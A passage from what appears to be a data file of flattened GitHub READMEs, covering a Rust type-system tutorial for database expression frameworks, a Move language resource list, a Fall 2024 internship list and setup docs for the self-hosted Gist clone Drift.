that junk (stuff i feel, just the same as you!!) but some ppl need more encouragement than others so i won't attempt a one-size fits all spiel here 😉 but if you have questions/feedback/concerns/ideas/whatev PLEASE don't hesitate to ask for help on our discord server !! with that, i relinquish all creative control of this beautiful beast. godspeed, Little Mario. make mommy proud 💖;open source collective hell game;game,game-development,gamedev,godot
a-little-org-called-mario/a-little-game-called-mario
skyzh/type-exercise-in-rust;Type Exercise in Rust This is a short lecture on how to use the Rust type system to build necessary components in a database system. The lecture evolves around how Rust programmers (like me) build database systems in the Rust programming language. We leverage the Rust type system to minimize runtime cost and make our development process easier with safe , nightly Rust. In this tutorial, you will learn: How to build an Arrow-like library with strong compile-time type. (Day 1 - 3) How to use declarative macros to implement dispatch functions on a non-object-safe trait. (Day 4) How to use GAT (generic associated types) and how to vectorize any scalar function with GAT generic parameter. (Day 5 - 6) ... how to by-pass compiler bugs on GAT lifetime in Fn trait. ... how to manually implement covariant on GAT lifetime. ... how to correctly add trait bounds for GAT. How to use declarative macros to associate things together. (Day 7) Community You may join skyzh's Discord server and study with the type-exercise community. See Also... RisingLight RisingLight is an OLAP database system for educational purpose. Most of the techniques described in this lecture have already been implemented in our educational database system “RisingLight”. Databend Databend's expression evaluation implementation is greatly influenced by type-exercise. You may see the implementation in datavalues crate . RisingWave RisingWave is a cloud-native streaming database product. It is the first time that I experimented with GAT-related things in RisingWave to auto vectorize expressions. It applies almost the same techniques as described in this lecture. TiKV Coprocessor I worked on TiKV two years ago on its expression evaluation framework. At the time of building TiKV coprocessor , there is no GAT. TiKV coprocessor is an example of using procedural macro to unify behavior of different types of arrays, which is totally a different approach from this tutorial (but maybe in a more understandable manner). You may also take a look! Related Issues in Rust Compiler During writing this tutorial, I found several confusing compile errors from the compiler. If all of them have been solved on the Rust side, we could have written GAT program easier! https://github.com/rust-lang/rust/issues/93342 https://github.com/rust-lang/rust/issues/93340 Deep Dive Type Exercise Series (in Chinese) On My Blog: * Part 0 - Part 2 * Part 3 - Part 6 * Part 7 On Zhihu: * Part 0: Intro * Part 1: Array and ArrayBuilder * Part 2: Scalar and ScalarRef * Part 3, 4: TryFrom and Macro Expansion * Part 5, 6: Bypassing GAT Compile Errors (or Compiler Bugs?) * Part 7: Associate Logical Types with Physical Types Day 1: Array and ArrayBuilder ArrayBuilder and Array are reciprocal traits. ArrayBuilder creates an Array , while we can create a new array using ArrayBuilder with existing Array . In day 1, we implement arrays for primitive types (like i32 , f32 ) and for variable-length types (like String ). We use associated types in traits to deduce the right type in generic functions and use GAT to unify the Array interfaces for both fixed-length and variable-length types. This framework is also very similar to libraries like Apache Arrow, but with much stronger type constraints and much lower runtime overhead. The special thing is that, we use blanket implementation for i32 and f32 arrays -- PrimitiveArray<T> . This would make our journey much more challenging, as we need to carefully evaluate the trait bounds needed for them in the following days. Goals Developers can create generic functions over all types of arrays -- no matter fixed-length primitive array like I32Array , or variable-length array like StringArray . Without our Array trait, developers might to implement... rust fn build_i32_array_from_vec(items: &[Option<i32>]) -> Vec<i32> { /* .. */ } fn build_str_array_from_vec(items: &[Option<&str>]) -> Vec<String> { /* .. */ } Note that the function takes different parameter -- one i32 without lifetime, one &str . Our Array trait can unify their behavior: ```rust fn build_array_from_vec (items: &[Option<A::RefItem<'_>>]) -> A { let mut builder = A::Builder::with_capacity(items.len()); for item in items { builder.push(*item); } builder.finish() } [test] fn test_build_int32_array() { let data = vec![Some(1), Some(2), Some(3), None, Some(5)]; let array = build_array_from_vec:: (&data[..]); } [test] fn test_build_string_array() { let data = vec![Some("1"), Some("2"), Some("3"), None, Some("5"), Some("")]; let array = build_array_from_vec:: (&data[..]); } ``` Also, we will be able to implement an ArrayIterator for all types of Array s. Day 2: Scalar and ScalarRef Scalar and ScalarRef are reciprocal types. We can get a reference ScalarRef of a Scalar , and convert ScalarRef back to Scalar . By adding these two traits, we can write more generic functions with zero runtime overhead on type matching and conversion. Meanwhile, we associate Scalar with Array , so as to write functions more easily. Goals Without our Scalar implement, there could be problems: rust fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A { let mut builder = A::Builder::with_capacity(len); for _ in 0..len { builder.push(Some(item /* How to convert `item` to `RefItem`? */)); } builder.finish() } With Scalar trait and corresponding implements, rust fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A { let mut builder = A::Builder::with_capacity(len); for _ in 0..len { builder.push(Some(item.as_scalar_ref())); // Now we have `as_scalar_ref` on `Scalar`! } builder.finish() } Day 3: ArrayImpl , ArrayBuilderImpl , ScalarImpl and ScalarRefImpl It could be possible that some information is not available until runtime. Therefore, we use XXXImpl enums to cover all variants of a single type. At the same time, we also add TryFrom<ArrayImpl> and Into<ArrayImpl> bound for Array . Goals This is hard -- imagine we simply require TryFrom<ArrayImpl> and Into<ArrayImpl> bound on Array : rust pub trait Array: Send + Sync + Sized + 'static + TryFrom<ArrayImpl> + Into<ArrayImpl> Compiler will complain: 43 | impl<T> Array for PrimitiveArray<T> | ^^^^^ the trait `From<PrimitiveArray<T>>` is not implemented for `array::ArrayImpl` | = note: required because of the requirements on the impl of `Into<array::ArrayImpl>` for `PrimitiveArray<T>` This is because we use blanket implementation for PrimitiveArray to cover all primitive types. In day 3, we learn how to correctly add bounds to PrimitiveArray . Day 4: More Types and Methods with Macro ArrayImpl should supports common functions in traits, but Array trait doesn't have a unified interface for all types -- I32Array accepts get(&self, idx: usize) -> Option<i32> while StringArray accepts get(&self, idx: usize) -> &str . We need a get(&self, idx:usize) -> ScalarRefImpl<'_> on ArrayImpl . Therefore, we have to write the match arms to dispatch the methods. Also, we have written so many boilerplate code for From and TryFrom . We need to eliminate such duplicated code. As we are having more and more data types, we need to write the same code multiple times within a match arm. In day 4, we use declarative macros (instead of procedural macros or other kinds of code generator) to generate such code and avoid writing boilerplate code. Goals Before that, we need to implement every TryFrom or Scalar by ourselves: ```rust impl<'a> ScalarRef<'a> for i32 { type ArrayType = I32Array; type ScalarType = i32; fn to_owned_scalar(&self) -> i32 { *self } } // repeat the same code fore i64, f64, ... ``` rust impl ArrayImpl { /// Get the value at the given index. pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> { match self { Self::Int32(array) => array.get(idx).map(ScalarRefImpl::Int32), Self::Float64(array) => array.get(idx).map(ScalarRefImpl::Float64), // ... // repeat the types for every functions we added on `Array` } } With macros, we can easily add more and more types. In day 4, we will support: rust pub enum ArrayImpl { Int16(I16Array), Int32(I32Array), Int64(I64Array), Float32(F32Array), Float64(F64Array), Bool(BoolArray), String(StringArray), } With little code changed and eliminating boilerplate code. Day 5: Binary Expressions Now that we have Array , ArrayBuilder , Scalar and ScalarRef , we can convert every function we wrote to a vectorized one using generics. Goals Developers will only need to implement: rust pub fn str_contains(i1: &str, i2: &str) -> bool { i1.contains(i2) } And they can create BinaryExpression around this function with any type: rust // Vectorize `str_contains` to accept an array instead of a single value. let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(str_contains); // We only need to pass `ArrayImpl` to the expression, and it will do everything for us, // including type checks, loopping, etc. let result = expr .eval( &StringArray::from_slice(&[Some("000"), Some("111"), None]).into(), &StringArray::from_slice(&[Some("0"), Some("0"), None]).into(), ) .unwrap(); Developers can even create BinaryExpression around generic functions: rust pub fn cmp_le<'a, I1: Array, I2: Array, C: Array + 'static>( i1: I1::RefItem<'a>, i2: I2::RefItem<'a>, ) -> bool where I1::RefItem<'a>: Into<C::RefItem<'a>>, I2::RefItem<'a>: Into<C::RefItem<'a>>, C::RefItem<'a>: PartialOrd, { i1.into().partial_cmp(&i2.into()).unwrap() == Ordering::Less } ``rust // Vectorize cmp_le` to accept an array instead of a single value. let expr = BinaryExpression:: ::new( cmp_le:: , ); let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap(); // cmp_le can also be used on &str . let expr = BinaryExpression:: ::new( cmp_le:: , ); let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap(); ``` Day 6: Erase Expression Lifetime Vectorization looks fancy in the implementation in day 5, but there is a critical flaw -- BinaryExpression can only process &'a ArrayImpl instead of for any lifetime. rust impl<'a, I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> { pub fn eval(&self, i1: &'a ArrayImpl, i2: &'a ArrayImpl) -> Result<ArrayImpl> { // ... } } In day 6, we erase the expression lifetime by defining a BinaryExprFunc trait and implements it for all expression functions. The BinaryExpression will be implemented as follows: rust impl<I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> { pub fn eval(&self, i1: &ArrayImpl, i2: &ArrayImpl) -> Result<ArrayImpl> { // ... } } And there will be an Expression trait which can be made into a trait object: rust pub trait Expression { /// Evaluate an expression with run-time number of [`ArrayImpl`]s. fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>; } In this day, we have two solutions -- the hard way and the easy way. Goals -- The Easy Way If we make each scalar function into a struct, things will be a lot easier. Developers will now implement scalar function as follows: ```rust pub struct ExprStrContains; impl BinaryExprFunc for ExprStrContains { fn eval(&self, i1: &str, i2: &str) -> bool { i1.contains(i2) } } ``` And now we can have an expression trait over all expression, with all type and lifetime erased: rust pub trait Expression { /// Evaluate an expression with run-time number of [`ArrayImpl`]s. fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>; } Expression can be made into a Box<dyn Expression> , therefore being used in building expressions at runtime. ~~Goals -- The Hard Way~~ As rust-lang/rust #90087 lands, the compiler bugs have been fixed. So we don't need to do any extra work for this day to support function expressions. All BinaryExprFunc can be replaced with F: Fn(I1::RefType<'_>, I2::RefType<'_>) -> O . In the hard way chapter, we will dive into the black magics and fight against (probably) compiler bugs, so as to make function vectorization look very approachable to SQL function developers. To begin with, we will change the signature of BinaryExpression to take Scalar as parameter: rust pub struct BinaryExpression<I1: Scalar, I2: Scalar, O: Scalar, F> { func: F, _phantom: PhantomData<(I1, I2, O)>, } Then we will do a lot of black magics on Scalar type, so as to do the conversion freely between Array::RefItem and Scalar::RefType . This will help us bypass most of the issues in GAT, and yields the following vectorization code: rust builder.push(Some(O::cast_s_to_a( self.func .eval(I1::cast_a_to_s(i1), I2::cast_a_to_s(i2)) .as_scalar_ref(), ))) We will construct a bridge trait BinaryExprFunc between plain functions and the one that can be used by BinaryExpression . And finally developers can simply write a function and supply it to BinaryExpression . rust let expr = BinaryExpression::<String, String, bool, _>::new(str_contains); ... or even with lambda functions: rust let expr = BinaryExpression::<String, String, bool, _>::new(|x1: &str, x2: &str| x1.contains(x2)); Day 7: Physical Data Type and Logical Data Type i32 , i64 is simply physical types -- how types are stored in memory (or on disk). But in a database system, we also have logical types (like Char , and Varchar ). In day 7, we learn how to associate logical types with physical types using macros. Goals Going back to our build_binary_expression function, rust /// Build expression with runtime information. pub fn build_binary_expression( f: ExpressionFunc, ) -> Box<dyn Expression> { match f { CmpLe => Box::new(BinaryExpression::<I32Array, I32Array, BoolArray, _>::new( ExprCmpLe::<_, _, I32Array>(PhantomData), )), /* ... */ Currently, we only support i32 < i32 for CmpLe expression. We should be able to support cross-type comparison here. rust /// Build expression with runtime information. pub fn build_binary_expression( f: ExpressionFunc, i1: DataType, i2: DataType ) -> Box<dyn Expression> { match f { CmpLe => match (i1, i2) { (SmallInt, SmallInt) => /* I16Array, I16Array */, (SmallInt, Real) => /* I16Array, Float32, cast to Float64 before comparison */, /* ... */ } /* ... */ We have so many combinations of cross-type comparison, and we couldn't write them all by-hand. In day 7, we use macros to associate logical data type with Array traits, and reduce the complexity of writing such functions. Goals -- The Easy Way ```rust /// Build expression with runtime information. pub fn build_binary_expression( f: ExpressionFunc, i1: DataType, i2: DataType, ) -> Box { use ExpressionFunc::*; use crate::array::*; use crate::expr::cmp::*; use crate::expr::string::*; match f { CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpLe }, CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpGe }, CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpEq }, CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpNe }, StrContains => Box::new( BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(ExprStrContains), ), } } ``` Goals -- The Hard Way ```rust /// Build expression with runtime information. pub fn build_binary_expression( f: ExpressionFunc, i1: DataType, i2: DataType, ) -> Box { use ExpressionFunc::*; use crate::expr::cmp::*; use crate::expr::string::*; match f { CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_le }, CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ge }, CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_eq }, CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ne }, StrContains => Box::new(BinaryExpression::<String, String, bool, _>::new( str_contains, )), } } ``` The goal is to write as less code as possible to generate all combinations of comparison. Day 8: List Type In Apache Arrow, we have ListArray , which is equivalent to Vec<Option<Vec<Option<T>>>> . We implement this in day 8. rust let mut builder = ListArrayBuilder::with_capacity(0); builder.push(Some((&/* Some ArrayImpl */).into())); builder.push(Some((&/* Some ArrayImpl */).into())); builder.push(None); builder.finish(); Day 9: Boxed Array Use Box<dyn Array> instead of ArrayImpl enum. To make as few modifications as possible to the current codebase, we add two traits: PhysicalTypeOf : gets the physical type out of Array. DynArray : the object safe trait for Array. Then, we can have pub struct BoxedArray(Box<dyn DynArray>); for dynamic dispatch. Day 10: Expression Framework Now we are having more and more expression kinds, and we need an expression framework to unify them -- including unary, binary and expressions of more inputs. At the same time, we will also experiment with return value optimizations in variable-size types. TBD Lectures Day 11: Aggregators Aggregators are another kind of expressions. We learn how to implement them easily with our type system in day 10.;Learn Rust black magics by implementing an expression framework in database systems;rust,database,type,tutorial
skyzh/type-exercise-in-rust
MystenLabs/awesome-move;Awesome Move A curated list of code and content from the Move programming language community. Move is a programming language for writing safe smart contracts originally developed at Facebook to power the Libra blockchain. Move is designed to be a platform-agnostic language to enable common libraries, tooling, and developer communities across diverse blockchains with vastly different data and execution models. Move's ambition is to become the "JavaScript of web3" in terms of ubiquity--when developers want to quickly write safe code involving assets, it should be written in Move. Contents Overview Move-Powered Blockchains Books Tutorials Community Code Fungible Tokens Non-Fungible Tokens Decentralized Identity DeFi SocialFi On-Chain Governance Cross-Chain Bridge Accounts Frameworks Libraries Miscellaneous Tools IDEs Package Managers Wallets SDKs Papers Language Design Static Analysis and Verification Videos Slides Podcasts Blog Posts Security Overview Installation Problem Statement Move-Powered Blockchains Sui - A next-generation smart contract platform with high throughput, low latency, and an asset-oriented programming model powered by the Move programming language (in devnet ). 0L - A reference implementation of a neutral replicated state machine. Forked from the Libra/Diem technologies (in mainnet ). Starcoin - A smart contract blockchain network that scales by layering (in mainnet ). Aptos - Aptos-core strives towards being the safest and most scalable layer one blockchain solution (in mainnet ). Pontem - Substrate based parachain with MoveVM onboard (in testnet ). Celo - Blockchain with EVM and MoveVM ( coming soon ). Diem - The original Move based blockchain from Meta (form. Libra by Facebook) (discontinued). ChainX - Bitcoin's layer2 smart contract network has already supported WASM and EVM, and is supporting MoveVM (in mainnet ). Books Move Book - Move book maintained by the Move core team ( 中文 ). Move Book - Move book maintained by @damirka ( 中文 ). Move Patterns - A book on Move software design patterns maintained by @villesundell . Sui Move by Example - A book on the Sui Move variant maintained by @MystenLabs . Tutorials Implementing, testing, and verifying a fungible token - Maintained by the Move core team. Programming with objects - Maintained by the Sui team. Move and SmartContract Development - Maintained by the Starcoin team. Move Language - Interactive Move language course, free for everyone, maintained by imcoding.online ( 中文 ). Community Move Language Discord Move @ Sui by Mysten Labs Discord Move @ 0L Discord Move @ Starcoin Discord Move @ Aptos Discord MoveChina - The largest Chinese community for the Move programming language. Code Code written in Move. Fungible Tokens Fungible token examples - Multiple example token implementations from Sui. BasicCoin - A toy implementation of an ERC20 -like fungible token. Diem - An ERC20-like token with permissioned minting/burning, see also this spec . Deployed on 0L. Token - Another ERC20-like Token. Deployed on Starcoin. GAS - A token that instantiates the Diem standard above. Deployed on 0L. STC - A token that instantiates the Starcoin standard above. Deployed on Starcoin. STAR - A governance token of Starswap dApp that powers the AMM+DEX ecosystem. Deployed on Starcoin. XUSDT - A mapped assets of USDT on Starcoin. XETH - A mapped assets of ETH on Starcoin. WEN stablecoin - Deployed on Starcoin. FAI stablecoin - An over-collateralized stable coin deployed on Starcoin. FLY stablecoin - An implementation of forked OHM that deployed on Starcoin. Synthetic token backed by a basket containing a reserve of other tokens - From Diem. XBTC - BTC mirror asset on Aptos. XBTC - BTC mirror asset on Sui. Non-Fungible Tokens NFT examples - Multiple NFT example implementations from Sui. NFT - An ERC721-like token. Deployed on Starcoin. Merkle Airdrop - Utility for airdropping a large number of NFTs. Deployed on Starcoin. NFT - An implementation of a hybrid ERC721/ERC1155-like token. From Diem. BARS - An NFT that instantiates this hybrid standard. From Diem. MultiToken - An ERC1155-like token. From Diem. NFTGallery - Utility for holding multiple NFT's of the same type. From Diem. NFT Protocol - NFT protocol and collection framework. From OriginByte. Suia - The first POAP application on Sui. Decentralized Identity aptos-cid - Decentralized identity on Aptos, the underlying account system of ComingChat. MoveDID - MoveDID is a DID protocol that compatible with Move-based blockchain networks, including Aptos, Sui, and Starcoin. Maintained by the NonceGeek . DeFi DeFi examples - Multiple DeFi example implementations from Sui. CoinSwap - A toy implementation of a Uniswap -like liquidity pool containing two tokens. Starswap - A Uniswap-style DEX. Deployed on Starcoin. Offer - Generic implementation of atomic swaps for any pair of assets. AptosRedPacket - A red packet social app that combines private chat and encrypted wallet on Aptos. SuiRedPacket - A red packet social app that combines private chat and encrypted wallet on Sui. AptosAMMswap - Aptos AMM Swap implemented by the OmniBTC team. SuiAMMswap - Sui AMM Swap implemented by the OmniBTC team. AptosOmniSwap - One-click swap between aptos and EVM chains (such as ETH/BSC/AVAX, etc.) based on the cross-chain interoperability protocol wormhole. DolaProtocol - A Decentralized Omnichain Liquidity Aggregation Protocol with the single coin pool of each public chain as the core, Wormhole, Layerzero and other cross-chain messaging protocols as the bridge, and Sui public chain as the settlement center. ObjectMarket - A unique object trading marketplace in the Sui network. SocialFi Dmens - Decentralized Moments which is a Blockchain Twitter Protocol built on the Sui network. On-Chain Governance ValidatorUniverse - Validator set management. Deployed on 0L. Oracle - For on-chain community voting. Deployed on 0L. DAO - For on-chain proposals and voting. Deployed on Starcoin. DiemSystem - Validator set management. From Diem. Vote - On-chain voting. From Diem. Cross-Chain Bridge Poly Bridge - The first Cross-Chain Bridge between Move and EVM. Deployed on Starcoin. OmniBTC Bridge - A bridge between Bitcoin and Move language public chains (like Aptos and Sui) based on ultra-light node. Accounts Account - A generic account for Diem-powered chains. From Diem. DiemAccount - Fork of the above. From 0L. Account - Fork of the above. From Starcoin. Frameworks A Move framework is the set of Move modules included in the genesis state of the chain. These modules typically implement key concepts like accounts, currencies, . The ability to separate blockchain-specific framework logic from the generic functionality of the Move language is a key part of Move's platform-agnostic design. Sui Framework Aptos Framework 0L Framework Starcoin Framework Diem Framework Libraries Move standard library - Utilities intended (but not required) to be used in every platform running Move. From the Move repo. Move nursery - Experimental modules that may eventually be promoted into the standard library. From the Move repo. Decimal - Efficient implementation of a decimal value. From 0L. Math - Math utility functions. From Starcoin. Compare - Polymorphic comparison (i.e., compare any two Move values of the same type). From the nursery. Vault - Library for capabilities. From the nursery. ACL - Library for list-based access control. From the nursery. TaoHe - A collection of nestable Move resources. Starcoin Framework Commons - Libraries for Move commons utility on starcoin-framework. From Starcoin. Movemate - Smart contract building blocks for Aptos and Sui (Math utilities, governance contracts, escrow, and more). Maintained by the Pentagon team. Move cron parser - Library is built for a purpose of parsing cron expression. Maintained by Snowflake Network team. Miscellaneous Move-on-EVM - Experimental project to compile Move source code to EVM bytecode. aoc-move - Advent of Code solutions in Move with some formal verification. Tools Move Package Manager - Like cargo or npm for Move: single CLI (and corresponding Rust API's for other tools to hook into) for building, running, testing, debugging, and verifying Move packages . Maintained by the Move core team. Move Prover - Formal verification of user-defined specifications written in Move source code. Maintained by the Move core team. Move Read/Write Set Analyzer - Static analysis tool for computing an overapproximation of the global memory touched by a Move program. Maintained by the Move core team. Move Playground JS Library - Wrapping Move Playground by Pontem as a JavaScript library for browser. You can use it to build your own Move Playground. go-sui-indexer - An off-fullnode service to serve data from Sui Node. IDEs Move VS Code plugin - Maintained by the Move core team ( source code ). Move IntelliJ plugin - Maintained by the Pontem team ( source code ). Move Playground - Like Remix for Move. Alpha version of a Web IDE. See instructions . Maintained by the Pontem team. Starcoin IDE - Maintained by the Starcoin team ( source code ). Move Vim - Maintained by @rvmelkonian . move-mode - Major mode for Emacs maintained by @amnn . Package Managers Movey - A crates.io-style repository of Move packages. Wallets StarMask - A wallet for the Starcoin blockchain. Maintained by the Starcoin team ( Chrome Webstore ). Sui Wallet - A chrome (v88+) extension wallet for Sui ( Chrome Webstore ). Pontem Wallet - Wallet extension for Aptos network by the Pontem team ( Chrome Webstore ). Fewcha Aptos Wallet - The wallet of layer 1 blockchain Aptos ( Chrome Webstore ). bcs-js - JavaScript implementation of the BCS serialization scheme used by Move, may be useful for implementing wallets. ComingChat - A decentralized social finance/web3 portal. Supporting public chain wallets, such as Sui and Aptos wallets. Suiet Wallet - A open-source wallet for Sui. ( Chrome Webstore , Website ) Ethos Wallet - Open-source chrome extension wallet for Sui ( Chrome Webstore , Website ). Wallet Adapters Sui Wallet - Sui Wallet Adapter. Suiet Wallet - Suiet Wallet Adapter. Wallet Kits Suiet Wallet Kit - A package support all Sui wallets with customizable UI. Ethos Connect - UI with built-in wallet adapter and Email option for supporting all wallets and wallet-less users on Sui. SDKs Sui SDKs Rust SDK (official) TS/JS SDK (official) Golang SDK 1 (community) Golang SDK 2 (community) Python SDK (community) Java SDK (community) Kotlin SDK (community) C# SDK (community) Sui Dapps SDKs OmniSwap-Sui-SDK (community) Other network SDKs Aptos Golang SDK (community) Papers Language Design Move: A Language With Programmable Resources - This was the original Move white paper released in 2018. Many aspects of this are now out of date (e.g., the syntax and description of the bytecode instructions), but the first two sections are worth a read for explaining the difficulties of programming with assets and how Move tackles them. Robust Safety for Move The Move Borrow Checker Resources: A Safe Language Abstraction for Money Static Analysis and Verification Fast and Reliable Formal Verification of Smart Contracts with the Move Prover The Move Prover Verification of Programs Written in Libra's Move Language Exact and Linear-Time Gas-Cost Analysis Videos The Move Programming Language Move on Sui Move on Aptos Move: A Safe Language for Programming with Money - Talk from @sblackshear at the Fields Institute Blockchain research seminar series. Formal Verification of Move Programs for the Libra Blockchain - Talk from @DavidLDill at the Fields Institute Blockchain research seminar series. Move for the Masses - Talk at the Converge '22 . Slides Move deep dive Move overview - Slides from Reasoning About Financial Systems workshop at SBC '22 . Podcasts Move and Sui with Sam Blackshear from Mysten Labs Move AMA covering Move origin story Blog Posts Comparing Move and Rust smart contract development Comparing Diem-style Move and Sui Move Security Aptos-movevm Denial of Service Vulnerability Contributing Contributions welcome! Read the contribution guidelines first.;Code and content from the Move community.;awesome,awesome-list
MystenLabs/awesome-move
bsovs/Fall2024-Internships;Fall2024-Internships Should start posting in February 2024 Collection of Fall 2024 tech internships! Shoutout to GitHub user bsovs and The Pitt CS Club for developing the initial framework and list. Applying to internships? Autofill all your applications in a single click. Stop manually re-entering your information. Simplify’s extension helps you autofill internship applications on millions of sites. Check out SimplifyJobs list: https://simplify.jobs/l/Top-Fall-Internships To contribute: Fork repository Edit README.md Open a pull request! 📈 For tips on the internship process check out the Zero to Offer program here . 📈 🤗 Contribute by submitting a pull request ! 🤗 :warning: This repository is only for internships/co-ops in the United States, Canada or for Remote positions :earth_americas:. The List 👔 | Name | Location | Application Period | Notes | |---|-------------|-------------|-------------| | Astranis | San Francisco, CA | 🔒 Closed 🔒 | Software Developer – Intern | Astranis | San Francisco, CA | Open | Flight Software Engineer – Intern | SpaceX | 8 locations Austin, TX Irvine, CA Cape Canaveral, FL Brownsville, TX Redmond, WA McGregor, TX West Athens, CA Sunnyvale, CA | Open | Fall 2024 Software Engineering Internship/Co-op | Rocket Lab | Toronto, Canada | 🔒 Closed 🔒 | Software – Fall 2024 Internship | Relativity Space | Long Beach, CA | 🔒 Closed 🔒 | Software Engineer Intern | Tesla | 5 locations Palo Alto, CA Fremont, CA Austin, TX Reno, NV Toronto, ON | 🔒 Closed 🔒 | Internship, Software Engineer, Cell Engineering | Amazon | 46 locations Phoenix, AZ Tempe, AZ Berkeley, CA Culver City, CA Cupertino, CA East Palo Alto, CA Irvine, CA Los Angeles, CA Manhattan Beach, CA Palo Alto, CA San Diego, CA San Francisco, CA San Jose, CA San Luis Obispo, CA Santa Barbara, CA Santa Clara, CA Santa Cruz, CA Santa Monica, CA Sunnyvale, CA Boulder, CO Denver, CO Atlanta, GA Kennesaw, GA Chicago, IL Boston, MA Cambridge, MA Hudson, MA North Reading, MA Westborough, MA Baltimore, MD Detroit, MI Minneapolis, MN Jersey City, NJ New York, NY Portland, OR Philadelphia, PA Pittsburgh, PA Nashville, TN Austin, TX Dallas, TX Arlington, VA Herndon, VA Madison, WI Bellevue, WA Seattle, WA Redmond, WA | 🔒 Closed 🔒 | Software Development Engineer Internship | Rocket Lab | Toronto, Canada | Open | Quality Engineer Intern | Zoox | San Mateo, CA | Open | Software Engineering Intern Other Semesters Fall 2023 - bsovs Fall 2022 - bsovs Summer 2022 - (Pitt-CSC List) Fall 2021 Contributors jdkuffa <3;Collection of Fall 2023 tech internships!;internship,jobs
bsovs/Fall2024-Internships
MaxLeiter/Drift;Drift Note: This branch is where all work is being done to refactor to the Next.js 13 app directory and React Server Components. Drift is a self-hostable Gist clone. It's in beta, but is completely functional. You can try a demo at https://drift.lol. The demo is built on main but has no database, so files and accounts can be wiped at any time. If you want to contribute, need support, or want to stay updated, you can join the IRC channel at #drift on irc.libera.chat or reach me on twitter . If you don't have an IRC client yet, you can use a webclient here . Drift is built with Next.js 13, React Server Components, shadcn/ui , and Prisma . Contents: Setup Development Production Environment variables Running with pm2 Running with Docker Current status Setup Development In the root directory, run pnpm i . If you need pnpm , you can download it here . You can run pnpm dev in client for file watching and live reloading. To work with prisma , you can use pnpm prisma or pnpm exec prisma to interact with the database. Production pnpm build will produce production code. pnpm start will start the Next.js server. Environment Variables You can change these to your liking. .env : DRIFT_URL : the URL of the drift instance. DATABASE_URL : the URL to connect to your postgres instance. For example, postgresql://user:password@localhost:5432/drift . WELCOME_CONTENT : a markdown string that's rendered on the home page WELCOME_TITLE : the file title for the post on the homepage. ENABLE_ADMIN : the first account created is an administrator account REGISTRATION_PASSWORD : the password required to register an account. If not set, no password is required. NODE_ENV : defaults to development, can be production Auth environment variables Note: Only credential auth currently supports the registration password, so if you want to secure registration, you must use only credential auth. GITHUB_CLIENT_ID : the client ID for GitHub OAuth. GITHUB_CLIENT_SECRET : the client secret for GitHub OAuth. NEXTAUTH_URL : the URL of the drift instance. Not required if hosting on Vercel. CREDENTIAL_AUTH : whether to allow username/password authentication. Defaults to true . Running with pm2 It's easy to start Drift using pm2 . First, add the .env file with your values (see the above section for the required options). Then, use the following command to start the server: pnpm build && pm2 start pnpm --name drift --interpreter bash -- start Refer to pm2's docs or pm2 help for more information. Running with Docker Running with systemd NOTE: We assume that you know how to enable user lingering if you don't want to use the systemd unit as root As root Place the following systemd unit in /etc/systemd/system and name it drift.service Replace any occurrence of $USERNAME with the shell username of the user that will be running the Drift server ``` ########## # Drift Systemd Unit (Global) ########## [Unit] Description=Drift Server (Global) After=default.target [Service] User=$USERNAME Group=$USERNAME Type=simple WorkingDirectory=/home/$USERNAME/Drift ExecStart=/usr/bin/pnpm start Restart=on-failure [Install] WantedBy=default.target `` - As a nomal user - Place the following systemd unit inside ___/home/user/.config/systemd/user___ and name it _drift_user.service_ - Replace any occurrence of ___ $USERNAME`___ with the shell username of the user that will be running the Drift server ``` ########## # Drift Systemd Unit (User) ########## [Unit] Description=Drift Server (User) After=default.target [Service] Type=simple WorkingDirectory=/home/$USERNAME/Drift ExecStart=/usr/bin/pnpm start Restart=on-failure [Install] WantedBy=default.target ``` Current status Drift is a work in progress. Below is a (rough) list of completed and envisioned features. If you want to help address any of them, please let me know regardless of your experience and I'll be happy to assist. [x] Next.js 13 app directory [x] creating and sharing private, public, password-protected, and unlisted posts [x] syntax highlighting [x] expiring posts [x] responsive UI [x] user auth [ ] SSO via HTTP header (Issue: #11 ) [x] SSO via GitHub OAuth [x] downloading files (individually and entire posts) [x] password protected posts [x] postgres database [x] administrator account / settings [x] docker-compose (PRs: #13 , #75 ) [ ] publish docker builds [ ] user settings [ ] works enough with JavaScript disabled [ ] in-depth documentation [x] customizable homepage, so the demo can exist as-is but other instances can be built from the same source. Environment variable for the file contents? [ ] fleshed out API [ ] Swappable database backends [ ] More OAuth providers;Drift is a self-hostable Gist and paste service. Built with Next.js 13 and React Server Components.;gist,pastebin,pastebin-service,nodejs,nextjs,react,typescript,self-hosted,drift,nextjs13
MaxLeiter/Drift
